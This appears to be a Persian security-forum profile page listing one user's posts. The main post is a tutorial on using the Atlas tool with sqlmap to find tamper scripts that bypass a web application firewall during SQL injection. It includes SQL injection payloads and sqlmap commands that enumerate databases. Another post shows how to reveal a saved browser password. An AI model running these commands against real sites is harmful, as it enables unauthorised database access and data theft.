ts icon
سرور تیم اسپیک گاردایران

mownten

کاربر انجمن
  • تعداد ارسال ها

    313
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    80

آخرین بار برد mownten در 13 فروردین

mownten یکی از رکورد داران بیشترین تعداد پسند مطالب است !

درباره mownten

  • درجه

  • تاریخ تولد تعیین نشده

آخرین بازدید کنندگان نمایه

3,434 بازدید کننده نمایه
  1. اگر هم یک موقع دیدید که اینترنت ندارید و در هر کادر خاصی از پنجره ها بودید . حتی وقتی که یه جا پسوردتون ذخیره هست ولی یادتون رفته و میخواید ببینیدش که چی ذخیره شده میتونید با google chrome یا mozilla firefix روی کادر پسورد کلیک راست کنید و و Inespect رو بزنید. توی کدهای اون کادر میبینید که این عبارت نوشته شده: type=password این یعنی اینکه اون کادر موظف هست هر ورودی که داره رو به شکل پسورد با علامت ستاره نشون بده. شما هم عبارت password رو به text تغییر بدید و اینتر بزنید. میبینید که متن رو واضح نشون میده. این هم مال مواقعی که بخواید بصورت دستی، یه پسورد رو بخونید. موفق باشید
  2. mownten

    XXS

    سلام. دوست عزیز می بینم که تازه به جمع ما اضافه شدی و خوش اومدی. انگیزه ای هم داری برای انتشار اطالعات که خیلی خوبه. حتی این سمپل های XSS بدرد من هم میخوره. فقط ازت میخوام که کمی تمیزتر کار کنی. توضیحاتت رو توی فایل متنی ننویس. همین جا توی پست بنویس. لطفا کدها و دستورات رو توی یه فایل zip بذار با پسورد guardiran.org و بعدا پیوست کن. اینجوری خیلی بهم ریخته س جسارتا. موفق باشی.
  3. سلا. چه فرقی داره؟ اون آموزش مال تیر ماه سال 94 هست و حدود پنج سال ازش میگذره شما هم میتونی آخری نسخه ی accunetix رو بگیری و نصب کنی.
  4. [سطح: متوسط] با عرض سلام و تبریک سال نو به کاربران عزیز من امروز با یه مورد خوب و مشکل گشا توی حملات SQLi مواجه شدم که تصمیم گرفتم بیام براتون توضیح بدم. مساله اینه که بیشترین انگیزه برای حمله برای اکثریت کاربران، حمله به وبسایت های آسیب پذیر در قبال باگ SQL Injection هست لکن بعضی واقع با فایروال هایی مواجه میشن و وقتی کار رو بصورت کامل هم میسپرن به دست sqlmap، باز به مشکل بر میخورن. اینجا مهاجم باید از Tamperها استفاده بکنه تا بتونه فایروال رو بایپس کنه اما یکی دو تا نیستن که و sqlmap هم فقط گاها space2comment رو پیشنهاد میده. چطور میشه کل تمپر ها رو تست کرد؟ با ابزاری به نام Atlas. امروز با ابزار Atlas آشنا میشیم که برای بایپس کردن WAF یا IDS یا IPS و یافتن Tamper مناسب مفید هست. بریم سراغ اصل مطلب. دستورات نصب و اجرای این ابزار توی لینوکس به شرح زیر هست: $ git clone https://github.com/m4ll0k/Atlas.git atlas $ cd atlas $ python atlas.py فرض کنیم لینک اسیب پذیر ما این هست: http://site.com/index.php?id=Price_ASC و پیلود ما هم اینه: -1234 AND 4321=4321-- AAAA برای استفاده از این ابزار باید از دستور اینچنینی استفاده کنید: $ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v حالا این ابزار کجا و چه زمانی استفاده میشه؟ فرض کنید توی sqlmap از این دستور استفاده کردید و با یه WAF برخورد کردید: $ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 تصویر رو ببینید: در اینجا پیلود به شرح زیر هست که توسط WAF یا IPS یا IDS بلاک شده و با خطای 403 Forbidden مواجه شده. پیلود : Price_ASC') AND 8716=4837 AND ('yajr'='yajr کافیه همین پیلود رو ورداریم و بدیم به Atlas با tamper مناسب برای بایپس و حل این مشکل رو پیشنهاد بده. بدین شکل: $ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v حالا نتیجه : میبینیم که در خط سبک رنگ به ما پیشنهاد داده شده که از تمپری به نام Versiondkeywords استفاده کنیم تا اون فایروال روی وبسایت هدف، بایپس بشه. پس از این تمپر بدین شکل استفاده می کنیم: $ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords لینک دریافت Atlas از Github: https://github.com/m4ll0k/Atlas موفق باشید. سوالی هم داشتید در ادامه این تاپیک نپرسید. در تاپیک سوال و جواب بپرسید. Atlas-sqlmap-tamper-suggesy-master.zip
  5. mownten

    فراتر از جستجو

    1234
  6. mownten

    فراتر از جستجو

    1234
  7. mownten

    فراتر از جستجو

    1234
  8. mownten

    فراتر از جستجو

    1234
  9. mownten

    فراتر از جستجو

    1234
  10. mownten

    فراتر از جستجو

    1234
  11. mownten

    فراتر از جستجو

    1234
  12. mownten

    فراتر از جستجو

    1234
  13. mownten

    فراتر از جستجو

    1234
  14. mownten

    فراتر از جستجو

    1234
  15. mownten

    فراتر از جستجو

    1234